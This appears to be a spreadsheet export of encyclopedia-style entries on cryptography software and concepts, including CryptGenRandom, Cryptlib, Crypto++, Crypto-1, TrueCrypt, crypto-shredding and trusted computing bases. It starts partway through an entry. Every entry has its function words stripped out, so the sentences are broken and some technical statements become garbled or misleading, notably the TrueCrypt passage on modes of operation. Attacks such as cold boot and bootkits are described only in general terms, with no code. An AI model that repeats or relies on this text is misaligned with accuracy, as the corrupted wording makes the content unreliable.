result; fips evaluations necessarily inspect source code evaluate seeds generated. alternatives level windows developers several alternative means accessing cryptgenrandom functionality; alternatives invoke algorithm share security characteristics, advantages. using rtlgenrandom historically, always told developers functions rand generate keys, nonces passwords, rather functions like cryptgenrandom, creates cryptographically secure random numbers. problem cryptgenrandom need pull cryptoapi (cryptacquirecontext such) fine using crypto functions. default windows later install, cryptgenrandom calls function named advapi32!rtlgenrandom, require load cryptapi stuff. fact, whidbey function, rand_s calls rtlgenrandom. using rngcryptoserviceprovider programmers using .net rngcryptoserviceprovider class. using cryptography api: next generation (cng) long term replacement deprecated crypto api. provides equivalent function bcryptgenrandom well dedicated functions generation. programming languages microsoft library function rand_s uses rtlgenrandom recommended microsoft secure applications. python function urandom module, uses /dev/urandom unix-like systems, calls cryptgenrandom windows systems. java provider "sunmscapi" available openjdk oracle distributions windows provides securerandom implementation algorithm name windows-prng. this class forwards queries random seed bytes well setting additional seed bytes native cryptgenrandom. also entropy-supplying system calls approximate equivalent cryptgenrandom openbsd linux kernel /dev/random randomness source unix-like kernels random number generator attack references external links microsoft shared source licensing programs</t>
  </si>
  <si>
    <t>Cryptlib</t>
  </si>
  <si>
    <t>cryptlib open-source cross-platform software security toolkit library. distributed sleepycat license, free software license compatible general public license. alternatively, cryptlib available proprietary license preferring proprietary terms. features cryptlib security toolkit library allows programmers incorporate encryption authentication services software. provides high-level interface strong security capabilities added application without needing know many low-level details encryption authentication algorithms. comes page programming manual.at highest level, cryptlib provides implementations complete security services s/mime pgp/openpgp secure enveloping, ssl/tls secure sessions, services cmp, scep, rtcs, ocsp, security operations secure timestamping. since cryptlib uses industry-standard x.509, s/mime, pgp/openpgp, ssh/ssl/tls data formats, resulting encrypted signed data easily transported systems processed there, cryptlib runs many operating systems—all windows versions unix/linux systems. this allows email, files, transactions authenticated digital signatures encrypted industry-standard format. cryptlib provides capabilities including full x.509/pkix certificate handling (all x.509 versions x.509v1 x.509v4) support set, microsoft authenticode, identrus, sigg, s/mime, ssl, qualified certificates, pkcs certificate chains, handling certification requests crls (certificate revocation lists) including automated checking certificates crls online checking using rtcs ocsp, issuing revoking certificates using scep. also implements full range certification authority (ca) functions provides complete cmp, scep, rtcs, ocsp server implementations handle online certificate enrolment/issue/revocation certificate status checking. alongside certificate handling, provides sophisticated storage interface allows wide range database types ranging pkcs devices, pkcs files, pgp/openpgp rings commercial-grade rdbms' ldap directories optional protection. cryptlib make crypto capabilities variety external crypto devices hardware crypto accelerators, fortezza cards, pkcs devices, hardware security modules (hsms), crypto smart cards. used variety crypto devices received fips itsec/common criteria certification. crypto device interface also provides general-purpose plug-in capability adding functionality used cryptlib. cryptlib written supports beos, dos, mvs, os/2, tandem, variety unix versions (including aix, digital unix, dgux, freebsd/netbsd/openbsd, hp-ux, irix, linux, mp-ras, osf/1, qnx, sco/unixware, solaris, sunos, ultrix, uts4), vm/cms, windows 3.x, windows 95/98/me, windows ce/pocketpc/smartphone windows nt/2000/xp/vista. designed portable embedded system environments. available standard windows dll. language bindings available c++, .net, delphi, java, python, visual basic (vb). algorithm support release history cryptlib 3.4.5 released march 2019 (2019-03-08). cryptlib 3.4.4.1 released august 2018 (2018-08-21). cryptlib 3.4.4 released january 2018 (2018-01-10). cryptlib 3.4.3 released march 2016 (2016-03-25). cryptlib 3.4.2 released december 2012 (2012-12-17). cryptlib 3.4.1 released july 2011 (2011-07-27). cryptlib 3.4.0 released october 2010 (2010-10-06). cryptlib 3.3.2 released july 2008 (2008-07-03). cryptlib 3.3.1 released february 2007 (2007-02-01). cryptlib released september 2006 (2006-09-13). cryptlib 3.2.3a released august 2006 (2006-08-29). cryptlib 3.2.3 released july 2006 (2006-07-10). cryptlib 3.2.2 released september 2005 (2005-09-06). cryptlib 3.2.1 released august 2005 (2005-08-09). cryptlib released april 2005 (2005-04-18). cryptlib released december 2003 (2003-12-13). also openssl gnutls network security services libgcrypt matrixssl mbed (previously polarssl) wolfssl (previously cyassl) comparison implementations comparison cryptography libraries references external links official website cryptlib encryption security software development toolkit digital data security limited</t>
  </si>
  <si>
    <t>Crypto API (Linux)</t>
  </si>
  <si>
    <t>crypto cryptography framework linux kernel, various parts kernel deal cryptography, ipsec dm-crypt. introduced kernel version 2.5.45 since expanded include essentially popular block ciphers hash functions. userspace interfaces many platforms provide hardware acceleration encryption expose programs extension instruction architecture (isa) various chipsets (e.g. instruction x86). with sort implementation program (kernel-mode user-space) utilize features directly. some platforms, kirkwood sheevaplug geode processors, however, implemented extensions, accessible kernel-mode drivers. order user-mode applications utilize encryption, wolfssl, openssl gnutls, take advantage acceleration, must interface kernel. af_alg netlink-based interface adds af_alg address family; merged version 2.6.38 linux kernel mainline. there plugin openssl support af_alg, submitted merging. version 1.1.0, openssl landed another patch af_alg contributed intel. wolfssl make af_alg cryptodevcryptodev openbsd cryptographic framework /dev/crypto interface openbsd ported linux, never merged. also microsoft cryptoapi references</t>
  </si>
  <si>
    <t>Truncated differential cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, truncated differential cryptanalysis generalization differential cryptanalysis, attack block ciphers. lars knudsen developed technique 1994. whereas ordinary differential cryptanalysis analyzes full difference texts, truncated variant considers differences partially determined. that attack makes predictions bits instead full block. this technique applied safer, idea, skipjack, twofish, camellia, crypton, even stream cipher salsa20. references lars knudsen (1994). truncated higher order differentials (pdf/postscript). international workshop fast software encryption (fse 1994). leuven: springer-verlag. 196–211. retrieved february 2007. lars knudsen, thomas berson (1996). truncated differentials safer (pdf/postscript). international workshop fast software encryption (fse 1996). cambridge: springer-verlag. 15–26. retrieved february 2007. johan borst, lars knudsen, vincent rijmen (may 1997). attacks reduced idea. advances cryptology eurocrypt '97. konstanz: springer-verlag. 1–13. archived original (gzipped postscript) august 2000. retrieved march 2007.{{cite conference}}: maint: multiple names: authors list (link) lars knudsen, m.j.b. robshaw, david wagner (1999). truncated differentials skipjack (postscript). advances cryptology crypto '99. santa barbara, california: springer-verlag. 165–180. retrieved february 2007.{{cite conference}}: maint: multiple names: authors list (link) matsui, tokita (1999). cryptanalysis reduced version block cipher international workshop fast software encryption (fse 1999). rome: springer-verlag. 71–80. archived original (pdf) 2007-05-25. retrieved february 2007. shiho moriai; yiqun lisa (2000). "cryptanalysis twofish (ii)" (pdf). retrieved february 2007. {{cite journal}}: cite journal requires |journal= (help) crowley, paul (2006). "truncated differential cryptanalysis five rounds salsa20". retrieved february 2007.</t>
  </si>
  <si>
    <t>Crypto++</t>
  </si>
  <si>
    <t>crypto++ (also known cryptopp, libcrypto++, libcryptopp) free open-source class library cryptographic algorithms schemes written dai. crypto++ widely used academia, student projects, open-source, non-commercial projects, well businesses. released 1995, library fully supports 32-bit 64-bit architectures many major operating systems platforms, including android (using stlport), apple (mac ios), bsd, cygwin, s/390, linux, mingw, solaris, windows, windows phone windows project also supports compilation using c++03, c++11, c++14, c++17 runtime libraries; variety compilers ides, including borland turbo c++, borland builder, clang, codewarrior pro, (including apple's gcc), intel compiler (icc), microsoft visual c/c++, studio. crypto++ released june 1995, download longer available. crypto++ release withdrawn data security, asserting copyright claim algorithm. versions library available download. algorithms crypto++ ordinarily provides complete cryptographic implementations often includes less popular, less frequently-used schemes. example, camellia iso/nessie/ietf-approved block cipher roughly equivalent aes, whirlpool iso/nessie/ietf-approved hash function roughly equivalent sha; included library.additionally, crypto++ library sometimes makes proposed bleeding-edge algorithms implementations available study cryptographic community. example, vmac, universal hash-based message authentication code, added library submission internet engineering task force (cfrg working group); brainpool curves, proposed march 2009 internet draft 5639, added crypto++ 5.6.0 month. library also makes available primitives number-theoretic operations fast multi-precision integers; prime number generation verification; finite field arithmetic, including gf(p) gf(2n); elliptical curves; polynomial operations. furthermore, library retains collection insecure obsolescent algorithms backward compatibility historical value: md2, md4, md5, panama hash, des, arc4, seal 3.0, wake, wake-ofb, desx (des-xex3), rc2, safer, 3-way, gost, shark, cast-128, square. performance 2007 ecrypt workshop paper focusing public implementations eight libraries, ashraf abusharekh kris found "crypto++ [sic] leads terms support cryptographic primitives schemes, slowest investigated libraries."in 2008, speed tests carried timo bingmann using seven open-source security libraries block ciphers, crypto++ 5.5.2 top-performing library block ciphers rank average library performance remaining block ciphers.crypto++ also includes auto-benchmarking feature, available command line (cryptest.exe results available crypto++ 5.6.0 benchmarks.as many cryptographic libraries available 32-bit 64-bit architectures, crypto++ includes assembly routines using aes-ni. with aes-ni, performance improves dramatically: 128-bit aes/gcm throughput increases approximately 28.0 cycles byte cycles byte. version releases crypto++ released june 1995. since initial release, library seen nearly dozen revisions, including architectural change version 5.0. there releases using version architecture since march 2009. lawrence teo's compilation previous crypto++ releases dating back 1995 found users group archives. fips validations crypto++ received three federal information processing standard (fips) 140-2 level module validations post-validation issues. crypto++ moved cmvp's historical validation list 2016. move effectively means library longer validated. licensing version 5.6.1, crypto++ consists public domain files, compilation copyright single open source license compilation copyright: license crypto++ somewhat unusual amongst open source projects. distinction made library compilation (i.e., collection), copyrighted dai, individual files public domain. library copyrighted compilation order place certain disclaimers (regarding warranty, export, patents) license keep attributions public domain declarations intact crypto++ distributed source code form. fact individual files public domain means legally place code segments, entire files, small sets files limit fair use) project anything want without worrying copyright. also computer science symmetric cipher comparison cryptography libraries references external links official website crypto++ github project list projects crypto++ (includes nonprofit profit projects) crypto++ users group</t>
  </si>
  <si>
    <t>Crypto-1</t>
  </si>
  <si>
    <t>crypto1 proprietary encryption algorithm (stream cipher) authentication protocol created semiconductors mifare classic rfid contactless smart cards launched 1994. such cards used many notable systems, including oyster card, charliecard ov-chipkaart. 2009, cryptographic research reverse engineered cipher variety attacks published effectively broke security.nxp responded issueing "hardened" (but still backwards compatible) cards, mifare classic ev1. however, 2015 attack rendered cards insecure, recommends migrating away mifare classic. technical description crypto1 stream cipher similar structure successor, hitag2. crypto1 consists 48-bit linear feedback shift register state cipher, two-layer 20-to-1 nonlinear function used generate keystream, 16-bit lfsr used authentication phase pseudo random number generatorthe usual operation crypto1 hitag2 ciphers uses nonlinear feedback initialization/authentication stage, switching operation lfsr nonlinear output filter (filter generator) rest communications. also keeloq references external links radboud universiteit nijmegen press release english) details mifare reverse engineering henryk plötz german) windows crypto1 tool, optimized proxmark3</t>
  </si>
  <si>
    <t>TrueCrypt</t>
  </si>
  <si>
    <t>truecrypt discontinued source-available freeware utility used on-the-fly encryption (otfe). create virtual encrypted disk within file, encrypt partition whole storage device (pre-boot authentication). 2014, truecrypt website announced project longer maintained recommended users find alternative solutions. though development truecrypt ceased, independent audit truecrypt (published march 2015) concluded significant flaws present. projects forked truecrypt: veracrypt (active) ciphershed (abandoned). history truecrypt initially released version february 2004, based (encryption masses). several versions many additional minor releases made since then, current version 7.1a. securstar dispute original release truecrypt made anonymous developers called "the truecrypt team". shortly version released 2004, truecrypt team reported receiving email wilfried hafner, manager securstar, computer security company. according truecrypt team, hafner claimed email acknowledged author e4m, developer paul roux, stolen source code securstar employee. stated roux illegally distributed e4m, authored illegal license permitting anyone base derivative work code distribute freely. hafner alleges versions always belonged securstar, roux right release license.this truecrypt team immediately stop developing distributing truecrypt, announced online usenet. truecrypt team member david tesařík stated roux informed team legal dispute securstar, received legal advisement comment issues case. tesařík concluded truecrypt team continue distributing truecrypt, roux ultimately held liable forced consequent damages securstar. continue good faith, said, team would need verify validity license. however, roux's need remain silent matter, unable confirm deny legitimacy, keeping truecrypt development limbo.thereafter, would-be visitors reported trouble accessing truecrypt website, third-party mirrors appeared online making source code installer continually available, outside official sanction truecrypt team.in section website, securstar maintains claims ownership scramdisk, another free encryption program. company states products, securstar "had long tradition open source software", "competitors nothing better steal source code", causing company make products closed-source, forcing potential customers place substantial order sign non-disclosure agreement allowed review code security.le roux denied developing truecrypt court hearing march 2016, also confirmed written e4m. version months later june 2004, truecrypt released. version contained different digital signature original truecrypt team, developers referred "the truecrypt foundation." software license also changed open source general public license (gpl). however, given wide range components differing licenses making software, contested nature legality program's release, weeks later june, version released original license avoid potential problems relating license.version 2.1a software released october 2004 truecrypt.sourceforge.net sub-domain. 2005, original truecrypt website returned truecrypt.sourceforge.net redirected visitors truecrypt.org. life announcement 2014, truecrypt official website, truecrypt.org, began redirecting visitors truecrypt.sourceforge.net http "moved permanently" status, warned software contain unfixed security issues, development truecrypt ended 2014, following windows xp's support. message noted recent versions windows built-in support disk encryption using bitlocker, linux similar built-in solutions, message states renders truecrypt unnecessary. page recommends data encrypted truecrypt migrated encryption setups offered instructions moving bitlocker. sourceforge project page software sourceforge.net/truecrypt updated display initial message, status changed "inactive." page also announced software version, 7.2, allows decryption. initially, authenticity announcement software questioned. multiple theories attempting explain reason behind announcement arose throughout tech community.shortly life announcement truecrypt, gibson research corporation posted announcement titled "yes... truecrypt still safe use" final release repository host last official non-crippled version 7.1a truecrypt. they longer 2022. truecrypt.org excluded internet archive wayback machine. their exclusion policy says exclude pages site owner request. operating systems truecrypt supports windows, linux operating systems. both 32-bit 64-bit versions operating systems supported, except windows ia-64 (not supported) 10.6 snow leopard (runs 32-bit process). version windows windows vista, windows encrypt boot partition entire boot drive. independent implementations there independent, compatible implementation, tcplay, dragonfly linux.the dm-crypt module included default linux kernel supports truecrypt target called "tcw" since linux version 3.13. encryption scheme algorithms individual ciphers supported truecrypt aes, serpent, twofish. additionally, five different combinations cascaded algorithms available: aes-twofish, aes-twofish-serpent, serpent-aes, serpent-twofish-aes twofish-serpent. cryptographic hash functions available truecrypt ripemd-160, sha-512, whirlpool. modes operation truecrypt currently uses mode operation. prior this, truecrypt used mode versions 4.3a, mode versions earlier. mode thought secure mode, turn secure mode.although volumes created mode, truecrypt backward compatible older volumes using mode mode. later versions produce security warning mounting mode volumes recommend replaced volumes mode. keys header secondary header (xts mode) generated using pbkdf2 512-bit salt 1000 2000 iterations, depending underlying hash function used. plausible deniability truecrypt supports concept called plausible deniability, allowing single "hidden volume" created within another volume. addition, windows versions truecrypt ability create hidden encrypted operating system whose existence denied.the truecrypt documentation lists many ways truecrypt's hidden volume deniability features compromised (e.g. third-party software leak information temporary files, thumbnails, etc., unencrypted disks) possible ways avoid this. paper published 2008 focused latest version (v5.1a) plausible deniability, team security researchers bruce schneier states windows vista, microsoft word, google desktop, others store information unencrypted disks, might compromise truecrypt's plausible deniability. study suggested addition hidden operating system functionality; feature added truecrypt 6.0. when hidden operating system running, truecrypt also makes local unencrypted filesystems non-hidden truecrypt volumes read-only prevent data leaks. security truecrypt's implementation feature evaluated first version truecrypt option recently released.there functional evaluation deniability hidden volumes earlier version truecrypt schneier found security leaks. identifying truecrypt volumes when analyzed, truecrypt volumes appear header contain random data. truecrypt volumes sizes multiples block size cipher mode data either bytes stored separately case system encryption headers non-system containers. forensics tools properties file size, apparent lack header, randomness tests attempt identify truecrypt volumes. although features give reason suspect file truecrypt volume, are, however, programs exist purpose securely erasing files employing method overwriting file contents, free disk space, purely random data (i.e. "shred" "scrub"), thereby creating reasonable doubt counter pointed accusations declaring file, made statistically random data, truecrypt file.if system drive, partition encrypted truecrypt, data partition deniable. when truecrypt boot loader replaces normal boot loader, offline analysis drive positively determine truecrypt boot loader present lead logical inference truecrypt partition also present. even though features obfuscate purpose (i.e. displaying bios-like message misdirect observer "non-system disk" "disk error"), reduce functionality truecrypt boot loader hide content truecrypt boot loader offline analysis. here again, hidden operating system suggested method retaining deniability. performance truecrypt supports parallelized: encryption multi-core systems and, microsoft windows, pipelined read/write operations form asynchronous processing): reduce performance encryption decryption. newer processors supporting aes-ni instruction set, truecrypt supports hardware-accelerated improve performance.: performance impact disk encryption especially noticeable operations would normally direct memory access (dma), data must pass decryption, rather copied directly disk ram. test carried tom's hardware, although truecrypt slower compared unencrypted disk, overhead real-time encryption found similar regardless whether mid-range state-of-the-art hardware use, impact "quite acceptable". another article performance cost found unnoticeable working "popular desktop applications reasonable manner", noted "power users complain". incompatibility flexnet publisher safecast installing third-party software uses flexnet publisher safecast (which used preventing software piracy products adobe adobe photoshop) damage truecrypt bootloader windows partitions/drives encrypted truecrypt render drive unbootable. this caused inappropriate design flexnet publisher writing first drive track overwriting whatever non-windows bootloader exists there. security concerns truecrypt vulnerable various known attacks also present disk encryption software releases bitlocker. prevent those, documentation distributed truecrypt requires users follow various security precautions. some attacks detailed below. encryption keys stored memory truecrypt stores keys ram; ordinary personal computer dram maintain contents several seconds power longer temperature lowered). even degradation memory contents, various algorithms intelligently recover keys. this method, known cold boot attack (which would apply particular notebook computer obtained power-on, suspended, screen-locked mode), successfully used attack file system protected truecrypt. physical security truecrypt documentation states truecrypt unable secure data computer attacker physically accessed truecrypt used compromised computer user (this apply common case stolen, lost, confiscated computer). attacker physical access computer can, example, install hardware/software keylogger, bus-mastering device capturing memory, install malicious hardware software, allowing attacker capture unencrypted data (including encryption keys passwords), decrypt encrypted data using captured passwords encryption keys. therefore, physical security basic premise secure system. attacks often called "evil maid attacks". malware truecrypt documentation states truecrypt cannot secure data computer kind malware installed. malware keystrokes, thus exposing passwords attacker. "stoned" bootkit "stoned" bootkit, rootkit presented austrian software developer peter kleissner black technical security conference 2009, shown capable tampering truecrypt's mbr, effectively bypassing truecrypt's full volume encryption. potentially every hard disk encryption software affected kind attack encryption software rely hardware-based encryption technologies like tpm, attack made administrative privileges encrypted operating system running.two types attack scenarios exist possible maliciously take advantage bootkit: first one, user required launch bootkit administrative privileges already booted windows; second one, analogously hardware keyloggers, malicious person needs physical access user's truecrypt-encrypted hard disk: context needed modify user's truecrypt stoned bootkit place hard disk back unknowing user's user boots types his/her truecrypt password boot, "stoned" bootkit intercepts thereafter because, moment stoned bootkit loaded truecrypt's boot sequence. first type attack prevented usual good security practices, e.g. avoid running non-trusted executables administrative privileges. second successfully neutralized user he/she suspects encrypted hard disk might physically available someone he/she trust, booting encrypted operating system truecrypt's rescue disk instead booting directly hard disk. with rescue disk, user restore truecrypt's hard disk. trusted platform module section truecrypt website states trusted platform module (tpm) cannot relied upon security, attacker physical administrative access computer afterwards, computer could modified attacker e.g. malicious component—such hardware keystroke logger—could used capture password sensitive information. since prevent attacker maliciously modifying computer, truecrypt support tpm. security audits 2013 graduate student concordia university published detailed online report, states confirmed integrity distributed windows binaries version 7.1a.a crowdfunding campaign attempting conduct independent security audit truecrypt successfully funded october 2013. non-profit organization called open crypto audit project (ocap) formed, calling community-driven global initiative grew first comprehensive public audit cryptanalysis widely used encryption software truecrypt". organization established contact truecrypt developers, welcomed audit. phase audit successfully completed april 2014, finding evidence backdoors malicious code". matthew green, auditors, added think good find anything super critical."one truecrypt's life announcement, ocap confirmed audit would continue planned, phase expected begin june 2014 wrap september. phase audit delayed, completed april 2015 cryptography services. this audit "found evidence deliberate backdoors, severe design flaws make software insecure instances." french national agency security information systems (anssi) stated truecrypt 7.1a previously attained anssi certification, migration alternate certified product recommended precautionary measure.according gibson research corporation, steven barnhart wrote email address truecrypt foundation member used past received several replies "david". according barnhart, main points email messages truecrypt foundation "happy audit, spark anything", reason announcement "there longer interest maintaining project]."according study released september 2015, truecrypt includes vulnerabilities driver truecrypt installs windows systems allowing attacker arbitrary code execution privilege escalation hijacking. january 2016, vulnerability fixed veracrypt, remains unpatched truecrypt's unmaintained installers. legal cases operation satyagraha july 2008, several truecrypt-secured hard drives seized brazilian banker daniel dantas, suspected financial crimes. brazilian national institute criminology (inc) tried unsuccessfully five months obtain access files truecrypt-protected disks. they enlisted help fbi, used dictionary attacks dantas' disks months, still unable decrypt them. united states john 2012 united states 11th circuit court appeals ruled john truecrypt user could compelled decrypt several hard drives. court's ruling noted forensic examiners unable past truecrypt's encryption (and therefore unable access data) unless either decrypted drives gave password, court ruled doe's fifth amendment right remain silent legally prevented government making david miranda august 2013 david miranda, partner journalist glenn greenwald, detained london's heathrow airport metropolitan police route janeiro berlin. carrying external hard drive said containing sensitive documents pertaining 2013 global surveillance disclosures sparked edward snowden. contents drive encrypted truecrypt, authorities said "renders material extremely difficult access." detective superintendent caroline goode stated hard drive contained around gigabytes data, accessed date." stated process decode material complex documents reconstructed since property initially received."guardian contributor naomi colvin concluded statements misleading, stating possible goode even referring actual encrypted material, rather deleted files reconstructed unencrypted, unallocated space hard drive, even plaintext documents miranda's personal effects. glenn greenwald supported assessment interview democracy now!, mentioning government filed affidavit asking court allow retain possession miranda's belongings. grounds request could break encryption, able access documents carrying, greenwald said "most probably ones related school work personal use." james desilva february 2014, arizona department real estate department employee, james desilva, arrested charges sexual exploitation minor sharing explicit images internet. computer, encrypted truecrypt, seized, desilva refused reveal password. forensics detectives maricopa county sheriff's office unable gain access stored files. lauri love october 2013, british–finnish activist lauri love arrested national crime agency (nca) charges hacking department agency computer count conspiring same. government confiscated electronics demanded provide necessary keys decrypt devices. love refused. 2016 district judge (magistrate's court) rejected request love forced turn encryption keys passwords truecrypt files card hard drives among confiscated property. druking special prosecutor investigation druking south korea, special prosecutor decrypted files encrypted truecrypt guessing passphrase.the special prosecutor said hidden volumes especially difficult deal with. decrypted encrypted files trying words phrases druking group used elsewhere parts passphrase order make educated guesses. license source model truecrypt released source-available, "truecrypt license," unique truecrypt software. version 7.1a (the last full version software, released 2012), truecrypt license version 3.0. part panoply widely used open source licenses. free software foundation (fsf) states free software license.discussion licensing terms open source initiative (osi)'s license-discuss mailing list october 2013 suggests truecrypt license made progress towards compliance open source definition would pass proposed certification open source software. according current president simon phipps: ...it appropriate [truecrypt] describe "open source." this term "open source" describe something license that's unapproved known subject issues unacceptable. director open source expert karl fogel said, "the ideal solution remove words 'open source' self-description, rather software osi-approved open source license." result questionable status regard copyright restrictions potential legal issues, major linux distributions consider truecrypt license free: truecrypt included debian, ubuntu, fedora, opensuse. life license version 2014 announcement discontinuation truecrypt also came version software. among many changes source code previous release changes truecrypt license including removal specific language required attribution truecrypt well link official website included derivative products forming license version 3.1.cryptographer matthew green, help raise funds truecrypt's audit noted connection truecrypt's refusal change license departure-time warning. "they whole thing fire, maybe nobody going trust they'll think there's evil vulnerability code."on june 2014, alleged truecrypt developer still answering email replied message matthew green asking permission truecrypt trademark fork released standard open source license. permission denied, known forks named veracrypt ciphershed well re-implementation named tc-play rather truecrypt. trademarks 2007 trademark truecrypt registered name ondrej tesarik company name truecrypt developers association trademark "key" logo registered name david tesarik company name truecrypt developers association.in 2009 company name truecrypt foundation registered person named david tesarik. truecrypt foundation non-profit organization last filed returns 2010, company dissolved 2014. also comparison disk encryption software references external links official website open crypto audit project (ocap) non-profit organization promoting audit truecrypt istruecryptauditedyet.com website audit veracrypt official fork website archives past versions filehippo past versions github past versions truecrypt.ch last version gibson research corporation website partial mirror original truecrypt 7.1a online manual</t>
  </si>
  <si>
    <t>Crypto-shredding</t>
  </si>
  <si>
    <t>crypto-shredding practice 'deleting' data deliberately deleting overwriting encryption keys. this requires data encrypted. data considered exist three states: data rest, data transit data use. general data security principles, triad confidentiality, integrity, availability, require three states must adequately protected. deleting data rest storage mediums backup tapes, data stored cloud, computers, phones, multi-function printers present challenges confidentiality information concern. when encryption place, data disposal secure. motivations there various reasons using crypto-shredding, including data contained defective out-of date systems, data, circumstances [longer] legal rights retain data, similar motivations. legal obligations also come regulations right forgotten, general data protection regulation, others. data security largely influenced confidentiality privacy concerns. cases data storage encrypted, encrypting entire harddisks, computer files, databases. alternatively specific data encrypted, passport numbers, social security numbers, bank account numbers, person names, record databases. additionally, data system encrypted separate keys data contained multiple systems. when specific pieces data encrypted (possibly different keys) allows specific data shredding. example devices macintosh computers apple apple silicon chip crypto-shredding performing "erase content settings" action discarding keys 'effaceable storage'. this renders user data device cryptographically inaccessible, short amount time. best practices storing encryption keys securely important shredding effective. instance, shredding effect symmetric asymmetric encryption already compromised. trusted platform module meant address issue. hardware security module considered secure ways store encryption keys. bring encryption refers cloud computing security model help cloud service customers encryption software manage encryption keys. crypographic "salting": hashing vulnerable single breach hash used data same. hash keys reverse engineered methods rainbow tables. salt meant address problem ensuring access hash compromise data. security considerations there many security issues considered securing data. some examples listed section.the security issues listed specific crypto-shredding, general apply types data encryption. addition crypto-shredding, data erasure, degaussing physically shredding physical device (disk) mitigate risk further. encryption strength weaken time computing speed becomes efficient time available discover exploits secure systems. brute-force attack: data adequately encrypted possible decrypt brute-force methods. newer technology quantum computing increases potential allow brute-force attacks become efficient future. however, quantum computing less effective specific encryption methods symmetric encryption others vulnerable brute-force attacks public-key encryption. even data secured symmetric encryption, methods grover's algorithm make kinds attacks effective, though mitigated enhancements, using larger values. data use: data use" specific vulnerabilities. example, (plaintext) encryption keys temporarily stored ram, vulnerable cold boot attacks, hardware advanced persistent threats, rootkits/bootkits, computer hardware supply chain attacks, physical threats users access. data remanence ability computer memory retain previously stored information beyond intended lifetime, also increases vulnerability unintended access. example: when data harddisk encrypted stored, possible unencrypted data remain harddisk. encrypting data necessarily ensure data overwritten location unencrypted data. addition, sectors harddisk cannot encrypted data written locations. encrypting data time written always secure encrypting stored without encryption. hibernation presents additional threats encryption used. once encryption loaded machine placed hibernation, memory, including encryption key, stored harddisk, outside encryption key's safe storage location. references</t>
  </si>
  <si>
    <t>TrueCrypt version history</t>
  </si>
  <si>
    <t>truecrypt based encryption masses (e4m), open source on-the-fly encryption program first released 1997. however, discontinued 2000 author, paul roux, began working commercial encryption software. version history also truecrypt veracrypt references</t>
  </si>
  <si>
    <t>CryptoBuddy</t>
  </si>
  <si>
    <t>cryptobuddy simple software application encryption compression computer files make safe secure. application uses 64-bit block cipher algorithm encryption proprietary compression algorithm. cryptobuddy software also used part cryptostick encryption device research triangle software, inc. software released public june 2002. references</t>
  </si>
  <si>
    <t>Trusted client</t>
  </si>
  <si>
    <t>computing, trusted client device program controlled user service, restrictions designed prevent ways authorized provider service. that client device vendors trust sell consumers, trust. examples include video games played computer network content scramble system (css) dvds. trusted client software considered fundamentally insecure: security broken user, break trivially copyable available others. computer security specialist bruce schneier states, "against average user, anything works; there's need complex security software. against skilled attacker, hand, nothing works." trusted client hardware somewhat secure, complete solution.trusted clients attractive business form vendor lock-in: sell trusted client loss charge would otherwise economically viable associated service. early example radio receivers subsidized broadcasters, restricted receiving radio station. modern examples include video recorders forced include macrovision copy protection, region code system region-coded video game consoles. technically knowledgeable consumers manufacturers frequently bypass limiting features trusted clients simple replacement fixed tuning capacitor early locked radios successful decss cryptographic attack 1999. manufacturers resorted legal threats digital millennium copyright similar laws prevent circumvention, varying degrees success. however, nature internet enables crack discovered published virtually impossible remove. trusted computing aims create computer hardware assists implementation restrictions software, attempts make circumvention restrictions difficult. also digital rights management dongle secure cryptoprocessor trust references</t>
  </si>
  <si>
    <t>Trusted computing base</t>
  </si>
  <si>
    <t>trusted computing base (tcb) computer system hardware, firmware, and/or software components critical security, sense bugs vulnerabilities occurring inside might jeopardize security properties entire system. contrast, parts computer system outside must able misbehave would leak privileges granted accordance security policy. careful design implementation system's trusted computing base paramount overall security. modern operating systems strive reduce size exhaustive examination code base means manual computer-assisted software audit program verification) becomes feasible. definition characterization term trusted computing base goes back john rushby, defined combination operating system kernel trusted processes. latter refers processes allowed violate system's access-control rules. classic paper authentication distributed systems: theory practice lampson define computer system simply small amount software hardware security depends distinguish much larger amount misbehave without affecting security.both definitions, clear convenient, neither theoretically exact intended e.g. network server process unix-like operating system might fall victim security breach compromise important part system's security, part operating system's tcb. orange book, another classic computer security literature reference, therefore provides formal definition computer system, totality protection mechanisms within including hardware, firmware, software, combination responsible enforcing computer security policy.in words, trusted computing base (tcb) combination hardware, software, controls work together form trusted base enforce security policy. orange book explains [t]he ability trusted computing base enforce correctly unified security policy depends correctness mechanisms within trusted computing base, protection mechanisms ensure correctness, correct input parameters related security policy.in words, given piece hardware software part designed part mechanism provides security computer system. operating systems, typically consists kernel microkernel) select system utilities (for example, setuid programs daemons unix systems). programming languages security features designed java formed language runtime standard library. properties predicated upon security policy consequence orange book definition, boundaries depend closely upon specifics security policy fleshed out. network server example above, even though, say, server serves multi-user application part operating system's tcb, responsibility performing access control users cannot usurp identity privileges other. sense, definitely part larger computer system comprises unix server, user's browsers application; words, breaching server e.g. buffer overflow regarded compromise operating system proper, certainly constitutes damaging exploit application. this fundamental relativity boundary exemplified concept 'target evaluation' ('toe') common criteria security process: course common criteria security evaluation, first decisions must made boundary audit terms list system components come scrutiny. prerequisite security systems trusted computing base part design provide security own: secure insofar security provided external means (e.g. computer sitting locked room without network connection considered secure depending policy, regardless software runs). this because, david farber [i]n computer system, integrity lower layers typically treated axiomatic higher layers. computer security concerned, reasoning security properties computer system requires able make sound assumptions can, importantly, cannot however, barring reason believe otherwise, computer able everything general neumann machine can. this obviously includes operations would deemed contrary simplest security policies, divulging email password kept secret; however, barring special provisions architecture system, denying computer could programmed perform undesirable tasks. these special provisions preventing certain kinds actions executed, essence, constitute trusted computing base. reason, orange book (still reference design secure operating systems 2007) characterizes various security assurance levels defines mainly terms structure security features tcb. software parts need protect outlined aforementioned orange book, software portions trusted computing base need protect tampering effect. this neumann architecture implemented virtually modern computers: since machine code processed another kind data, read overwritten program barring special memory management provisions subsequently treated part tcb. specifically, trusted computing base must least prevent software written many modern cpus, protection memory hosts achieved adding specialized piece hardware called memory management unit (mmu), programmable operating system allow deny access specific ranges system memory programs run. course, operating system also able disallow programming programs. this technique called supervisor mode; compared crude approaches (such storing rom, equivalently, using harvard architecture), advantage allowing security-critical software upgraded field, although allowing secure upgrades trusted computing base poses bootstrap problems own. trusted trustworthy stated above, trust trusted computing base required make progress ascertaining security computer system. words, trusted computing base “trusted” first foremost sense trusted, necessarily trustworthy. real-world operating systems routinely security-critical bugs discovered them, attests practical limits trust.the alternative formal software verification, uses mathematical proof techniques show absence bugs. researchers nicta spinout open kernel labs recently performed formal verification sel4, member microkernel family, proving functional correctness implementation kernel. this makes sel4 first operating-system kernel closes trust trustworthiness, assuming mathematical proof free error. size aforementioned need apply costly techniques formal verification manual review, size immediate consequences economics assurance process, trustworthiness resulting product 